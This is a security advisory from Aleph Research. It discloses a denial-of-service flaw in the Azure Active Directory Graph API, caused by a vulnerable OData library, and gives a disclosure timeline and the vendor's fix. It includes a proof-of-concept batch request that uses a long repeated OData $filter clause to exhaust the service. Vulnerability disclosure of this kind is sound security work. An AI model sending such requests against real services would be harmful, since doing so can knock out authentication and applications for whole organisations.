DOS vulnerability in Azure Active Directory Graph API

Aleph Research Advisory





  1. Azure Active Directory Graph API

Technical Details

A vulnerability in Azure Active Directory Graph API could allow a remote authenticated attacker to make the service unavailable.

Azure Active Directory is Microsoft’s cloud service that provides identity and access management (IAM) services. It is used by many organizations to authenticate users in Microsoft Azure applications as well as on-premises applications.

Azure Active Directory Graph API Graph API is a REST based interface that provides a programmatic access to this service.

Many applications use this API for the interaction with Azure Active Directory. If the graph API is unavailable for an organization, all the applications that use it will probably be unavailable as well.

The vulnerability is a result of the dependency this service has in Microsoft.Data.OData library which was vulnerable to remote DOS (See CVE-2018-8269). The exploit can be done by sending an OData Batch request that contain a $filter parameter with many repetitions of city+eq+'a'+or+city+eq+'a'+or+city+eq+'a'+ ....

Proof Of Concept

Here is an example of such a request.

POST https://graph.windows.net/<org id>/$batch?api-version=1.6 HTTP/1.1
Host: graph.windows.net
Authorization: Bearer XXXXX
content-type: multipart/mixed; boundary=RRR
Content-Length: 216

Content-type: application/http
Content-Transfer-Encoding: binary

GET https://graph.windows.net/<org id>/users?$filter=city+eq+'a'+or+city+eq+'a'+or.... HTTP/1.1
accept: application/json;odata=minimalmetadata



  • 22-Oct-18
    : Public disclosure.
  • 20-Oct-18
    : Vendor acknowledged report (We were able to reproduce the issue, and a fix has been applied.).
  • 15-Oct-18
    : Deadline.
  • 10-Oct-18
    : 14-day Deadline Extension Offered.
  • 18-Jul-18
    : Reported (Microsoft Security Response Center).



External References